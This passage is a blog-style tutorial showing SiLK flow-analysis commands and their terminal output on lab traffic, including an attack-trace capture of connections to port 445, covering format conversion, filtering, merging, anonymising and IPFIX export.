</div><div><br /></div><div>Change <b><i>rwcut </i></b>format of the IP address to decimal via <i>--ip-format=decimal</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all --pass-destination=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 | rwcut --fields=sip,dip --num-recs=5 --ip-format=decimal</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 879563851| 2887523844|</span>
<span style="color: white;"> 879560724| 2887523844|</span>
<span style="color: white;"> 879560724| 2887523844|</span>
<span style="color: white;"> 879563851| 2887523844|</span>
<span style="color: white;"> 879870852| 2887523844|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Convert the decimal values by to dotted notation via <b><i>num2dot </i></b><i>--ip-field</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=all --pass-destination=stdout --protocol=6 | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwcut --fields=sip,dip --num-recs=5 --ip-format=decimal | num2dot --ip-field=1,2</b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 52.109.20.75| 172.28.30.4|</span>
<span style="color: white;"> 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;"> 52.109.8.20| 172.28.30.4|</span>
<span style="color: white;"> 52.109.20.75| 172.28.30.4|</span>
<span style="color: white;"> 52.113.195.132| 172.28.30.4|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Show the IP addresses as hexadecimal via<i> <b>rwcut </b>--ip-format=hexadecimal</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --type=all \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=stdout --protocol=6 | rwcut --fields=sip,dip --num-recs=5 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--ip-format=hexadecimal</b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 346d144b| ac1c1e04|</span>
<span style="color: white;"> 346d0814| ac1c1e04|</span>
<span style="color: white;"> 346d0814| ac1c1e04|</span>
<span style="color: white;"> 346d144b| ac1c1e04|</span>
<span style="color: white;"> 3471c384| ac1c1e04|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Leveraging <b><i>rwaddrcount </i></b>to get information about the records in the file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwaddrcount attack-trace.rw --print-recs</span></b></span>
<span style="color: white;"> sIP| Bytes| Packets| Records| Start_Time| End_Time|</span>
<span style="color: white;"> 192.150.11.111| 7297| 153| 6| 2019/04/20T03:28:28| 2019/04/20T03:28:44|</span>
<span style="color: white;"> 98.114.205.102| 171264| 195| 6| 2019/04/20T03:28:28| 2019/04/20T03:28:44|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Get some additional file statistics via <b><i>rwaddrcount.</i></b></div><div><b><i><br /></i></b></div><div><b><i><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwaddrcount attack-trace.rw --print-stat</span></b></span>
<span style="color: white;"> | sIP_Uniq| Bytes| Packets| Records|</span>
<span style="color: white;"> Total| 2| 178561| 348| 12|</span>
</pre></td></tr></tbody></table></div>
</i></b></div><div><b><i><br /></i></b></div><div>What are the 2 actual unique source IP values in that file? Continuing with <b><i>rwaddrcount</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwaddrcount attack-trace.rw --print-ips</span></b></span>
<span style="color: white;"> sIP</span>
<span style="color: white;"> 192.150.11.111</span>
<span style="color: white;"> 98.114.205.102</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Leveraging <b><i>rwappend</i></b>, to create a new flow file, consisting of 2 existing flow files.</div><div><br /></div><div><div>Use <b><i>rwfilter </i></b>to create a file consisting of TCP flows.</div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 --max-pass=2 --type=all \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=tcp_file.rw --protocol=6</b></span>
</pre></td></tr></tbody></table></div>
</div><div>Use <b><i>rwfilter </i></b>to create a file consisting of UDP flows.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/02/09T16 </span></b></span><b><span style="color: #fcff01;">--max-pass=2 </span></b><b><span style="color: #fcff01;">--type=all \</span></b></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass-destination=udp_file.rw --protocol=17</b></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Combine the TCP and UDP flow files created by <b><i>rwfilter </i></b>using <b><i>rwappend</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwappend --create tcp_udp.rw tcp_file.rw udp_file.rw</span></b></span><b><span style="color: #fcff01;">
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwcut </i></b>to see the contents of the <b><i>rwappend</i></b> merged files.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut tcp_udp.rw --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|sPort|dPort|pro| packets| bytes| flags| sTime| duration| eTime| sensor|</span>
<span style="color: white;"> 52.109.20.75| 172.28.30.4| 443|50137| 6| 9| 8048| S PA |2022/02/09T16:01:29.214| 1.191|2022/02/09T16:01:30.405| Internal|</span>
<span style="color: white;"> 52.109.8.20| 172.28.30.4| 443|50138| 6| 7| 6533| S PA |2022/02/09T16:01:29.892| 0.513|2022/02/09T16:01:30.405| Internal|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137| 53|55874| 17| 1| 289| |2022/02/09T16:00:19.850| 0.002|2022/02/09T16:00:19.852| Internal|</span>
<span style="color: white;"> 17.253.26.125| 172.28.10.137| 123| 123| 17| 1| 76| |2022/02/09T16:00:35.377| 0.034|2022/02/09T16:00:35.411| Internal|</span>
</pre></td></tr></tbody></table></div></div><div><br /></div><div>Deduplicating two files into one via <b><i>rwdedupe</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwdedupe --buffer-size=88000 8.rw attack-trace.rw \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--output=deduped-data.rw</b></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwfilter</i></b> <i>--ip-version </i>to track IPv6 addresses.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05 --end=2022/07/01T23 --ip-version=6 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--type=all --max-pass=5 --pass-desti</span><span>nation=stdout | rwcut --fields=sip,dip,dport</span></span></b>
<span style="color: white;"> sIP| dIP|dPort|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:445| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:445| ff02::2| 0|</span>
<span style="color: white;"> fe80::250:56ff:fead:e8b6| ff02::2| 0|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Leveraging <b><i>rwpcut </i></b>to convert .pcap files to ASCII.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwpcut attack-trace.pcap 2>/dev/null | more</span></b></span>
<span style="color: white;">{'version': False, 'columns': False, 'delimiter': '|', 'epoch_time': False, 'fields': ['time</span>
<span style="color: white;">', 'sip', 'dip', 'sport', 'dport', 'proto', 'payhex'], 'integer_ips': False, 'zero_pad_ips':</span>
<span style="color: white;"> False, 'files': ['attack-trace.pcap']}</span>
<span style="color: white;">reading from file attack-trace.pcap, link-type EN10MB (Ethernet), snapshot length 65535</span>
<span style="color: white;">time|sip|dip|sport|dport|proto|payhex|</span>
<span style="color: white;">2019-04-20 03:28:28.374595|98.114.205.102|192.150.11.111|1821|445|6|450000303b9f40007106d24a</span>
<span style="color: white;">6272cd66c0960b6f071d01bd08cb8066000000007002faf0fa440000020405b401010402|</span>
<span style="color: white;">2019-04-20 03:28:28.375059|192.150.11.111|98.114.205.102|445|1821|6|450000300000400040063eea</span>
<span style="color: white;">c0960b6f6272cd6601bd071d5c3ba87408cb8067701216d0d9a40000020405b401010402|</span>
<span style="color: white;">2019-04-20 03:28:28.493653|98.114.205.102|192.150.11.111|1821|445|6|450000283bad40007106d244</span>
<span style="color: white;">6272cd66c0960b6f071d01bd08cb80675c3ba8755010faf022480000000000000000|</span>
<span style="color: white;">2019-04-20 03:28:28.508770|98.114.205.102|192.150.11.111|1821|445|6|450000283bae40007106d243</span>
<span style="color: white;">6272cd66c0960b6f071d01bd08cb80675c3ba8755011faf022470000000000000000|</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Ooops, that looks nasty. Making it cleaner by leveraging <i>--fields, --columnar and --delimiter.</i></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwpcut attack-trace.pcap --fields=sip,sport,dip,dport --columnar --delimiter=" | " \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--zero-pad-ips 2>/dev/null| more</span></b></span>
<span style="color: white;">{'version': False, 'columns': True, 'delimiter': ' | ', 'epoch_time': False, 'fields': ['</span>
<span style="color: white;">sip', 'sport', 'dip', 'dport'], 'integer_ips': False, 'zero_pad_ips': True, 'files': ['attac</span>
<span style="color: white;">k-trace.pcap']}</span>
<span style="color: white;">reading from file attack-trace.pcap, link-type EN10MB (Ethernet), snapshot length 65535</span>
<span style="color: white;"> sip | sport | dip | dport |</span>
<span style="color: white;">098.114.205.102 | 1821 | 192.150.011.111 | 445 |</span>
<span style="color: white;">192.150.011.111 | 445 | 098.114.205.102 | 1821 |</span>
<span style="color: white;">098.114.205.102 | 1821 | 192.150.011.111 | 445 |</span>
<span style="color: white;">098.114.205.102 | 1821 | 192.150.011.111 | 445 |</span>
<span style="color: white;">098.114.205.102 | 1828 | 192.150.011.111 | 445 |</span>
<span style="color: white;">192.150.011.111 | 445 | 098.114.205.102 | 1828 |</span>
<span style="color: white;">192.150.011.111 | 445 | 098.114.205.102 | 1821 |</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Converting a pcap to SiLK flow via <i style="font-weight: bold;">rwptoflow. </i>Then redirect the output to <b><i>rwcut</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwptoflow attack-trace.pcap | rwcut --num-recs=5 --fields=sip,dip,flags</span></b></span>
<span style="color: white;"> sIP| dIP| flags|</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| S |</span>
<span style="color: white;"> 192.150.11.111| 98.114.205.102| S A |</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| A |</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111|F A |</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| S |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Write the <b><i>rwptoflow </i></b>converted flow data to a file. At the same time, for the records that were used to create the flow, create another pcap file. Get the statistics when everything is done. Add a comment also.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwptoflow attack-trace.pcap --flow-output rwp_flow_file.rw \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--note-add "Converted from attacktrace.pcap" --compression-method=zlib \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--packet-pass-output=rwp.pcap --print-statistics --set-sensorid=1</span></b></span>
<span style="color: white;">Packet count statistics for attack-trace.pcap</span>
<span style="color: white;"> 348 read</span>
<span style="color: white;"> 0 rejected: too short to get information</span>
<span style="color: white;"> 0 rejected: not IPv4</span>
<span style="color: white;"> 348 total written</span>
<span style="color: white;"> 0 total fragmented packets</span>
<span style="color: white;"> 0 zero-packet of a fragment</span>
<span style="color: white;"> 0 incomplete (no ports and/or flags)</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Validate the <i>rwp.pcap</i> file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">file rwp.pcap</span></b></span>
<span style="color: white;">rwp.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 65535)</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Leveraging <b><i>rwrandomizeip </i></b>to randomize IPs.</div><div><br />First take 5 IPs from the <i>8.rw</i> file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields=sip,dip --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Now randomize the first 5 records via <b><i>rwrandomizeip</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwrandomizeip 8.rw | rwcut --fields=sip,dip --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 10.255.111.99| 10.39.63.221|</span>
<span style="color: white;"> 10.215.197.155| 10.56.240.34|</span>
<span style="color: white;"> 10.189.217.143| 10.192.119.61|</span>
<span style="color: white;"> 10.12.82.4| 10.251.82.128|</span>
<span style="color: white;"> 10.78.26.161| 10.173.1.103|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Convert SiLK flow data to IPFIX using <b><i>rwsilk2ipfix</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsilk2ipfix 8.rw --ipfix-output rw-2-2ipfix.dat --print-statistics</span></b></span>
<span style="color: white;">rwsilk2ipfix: Wrote 100 IPFIX records to 'rw-2-2ipfix.dat'</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>View a sample of the <b><i>rwsilk2ipfix</i></b> converted data using <b><i>yafscii</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">yafscii --in=rw-2-2ipfix.dat --out=- | more</span></b></span>
<span style="color: white;">2022-02-08 14:26:40.723 - 14:26:40.724 (0.001 sec) udp 8.8.8.8:53 => 172.28.10.137:56213 (1/218 ->)</span>
<span style="color: white;">2022-02-08 14:27:10.329 - 14:27:10.342 (0.013 sec) udp 8.8.8.8:53 => 172.28.10.137:55171 (1/102 ->)</span>
<span style="color: white;">2022-02-08 14:27:43.431 - 14:27:43.433 (0.002 sec) udp 8.8.8.8:53 => 172.28.10.137:54512 (1/213 ->)</span>
<span style="color: white;">2022-02-08 14:28:29.633 - 14:28:29.646 (0.013 sec) udp 8.8.8.8:53 => 172.28.10.137:55359 (1/100 ->)</span>
<span style="color: white;">2022-02-08 14:28:30.328 - 14:28:30.396 (0.068 sec) udp 8.8.8.8:53 => 172.28.10.137:54864 (1/108 ->)</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Taking a different view of the IPFIX record information via <b><i>ipfixDump</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">ipfixDump --yaf --in=rw-2-2ipfix.dat --out=- | more</span></b></span>
<span style="color: white;">--- Message Header ---</span>
<span style="color: white;">export time: 2023-06-15 16:04:04 observation domain id: 0</span>
<span style="color: white;">message length: 952 sequence number: 0 (0)</span>
<span style="color: white;">--- template record ---</span>
<span style="color: white;">header:</span>
<span style="color: white;"> tid: 40404 (0x9dd4) field count: 21 scope: 0</span>
<span style="color: white;">fields:</span>
<span style="color: white;"> ent: 0 id: 152 type: millisec len: 8 flowStartMilliseconds</span>
<span style="color: white;"> ent: 0 id: 153 type: millisec len: 8 flowEndMilliseconds</span>
<span style="color: white;"> ent: 0 id: 2 type: uint64 len: 4 packetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 1 type: uint64 len: 4 octetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 10 type: uint32 len: 2 ingressInterface</span>
<span style="color: white;"> ent: 0 id: 14 type: uint32 len: 2 egressInterface</span>
<span style="color: white;"> ent: 6871 id: 33 type: uint16 len: 2 silkAppLabel</span>
<span style="color: white;"> ent: 6871 id: 31 type: uint16 len: 2 silkFlowSensor</span>
<span style="color: white;"> ent: 6871 id: 30 type: uint8 len: 1 silkFlowType</span>
<span style="color: white;"> ent: 6871 id: 32 type: uint8 len: 1 silkTCPState</span>
<span style="color: white;"> ent: 0 id: 4 type: uint8 len: 1 protocolIdentifier</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 1 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 7 type: uint16 len: 2 sourceTransportPort</span>
<span style="color: white;"> ent: 0 id: 11 type: uint16 len: 2 destinationTransportPort</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 1 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 6 type: uint16 len: 1 tcpControlBits</span>
<span style="color: white;"> ent: 6871 id: 14 type: uint16 len: 1 initialTCPFlags</span>
<span style="color: white;"> ent: 6871 id: 15 type: uint16 len: 1 unionTCPFlags</span>
<span style="color: white;"> ent: 0 id: 8 type: ipv4 len: 4 sourceIPv4Address</span>
<span style="color: white;"> ent: 0 id: 12 type: ipv4 len: 4 destinationIPv4Address</span>
<span style="color: white;"> ent: 0 id: 15 type: ipv4 len: 4 ipNextHopIPv4Address</span>
<span style="color: white;">--- template record ---</span>
<span style="color: white;">header:</span>
<span style="color: white;"> tid: 40657 (0x9ed1) field count: 17 scope: 0</span>
<span style="color: white;">fields:</span>
<span style="color: white;"> ent: 0 id: 152 type: millisec len: 8 flowStartMilliseconds</span>
<span style="color: white;"> ent: 0 id: 153 type: millisec len: 8 flowEndMilliseconds</span>
<span style="color: white;"> ent: 0 id: 2 type: uint64 len: 4 packetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 1 type: uint64 len: 4 octetDeltaCount</span>
<span style="color: white;"> ent: 0 id: 10 type: uint32 len: 2 ingressInterface</span>
<span style="color: white;"> ent: 0 id: 14 type: uint32 len: 2 egressInterface</span>
<span style="color: white;"> ent: 6871 id: 33 type: uint16 len: 2 silkAppLabel</span>
<span style="color: white;"> ent: 6871 id: 31 type: uint16 len: 2 silkFlowSensor</span>
<span style="color: white;"> ent: 6871 id: 30 type: uint8 len: 1 silkFlowType</span>
<span style="color: white;"> ent: 6871 id: 32 type: uint8 len: 1 silkTCPState</span>
<span style="color: white;"> ent: 0 id: 4 type: uint8 len: 1 protocolIdentifier</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 1 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 210 type: octet len: 2 paddingOctets</span>
<span style="color: white;"> ent: 0 id: 139 type: uint16 len: 2 icmpTypeCodeIPv6</span>
<span style="color: white;"> ent: 0 id: 27 type: ipv6 len: 16 sourceIPv6Address</span>
<span style="color: white;"> ent: 0 id: 28 type: ipv6 len: 16 destinationIPv6Address</span>
<span style="color: white;"> ent: 0 id: 62 type: ipv6 len: 16 ipNextHopIPv6Address</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Convert the IPFIX file back to SiLK format using <b><i>rwipfix2silk</i></b>. Rather than writing the output to a file, write instead to stdout and use <i><b>rwcut </b></i>to see the values.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwipfix2silk --silk-output=- rw-2-2ipfix.dat | rwcut --fields sip,dip --num-recs=5</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
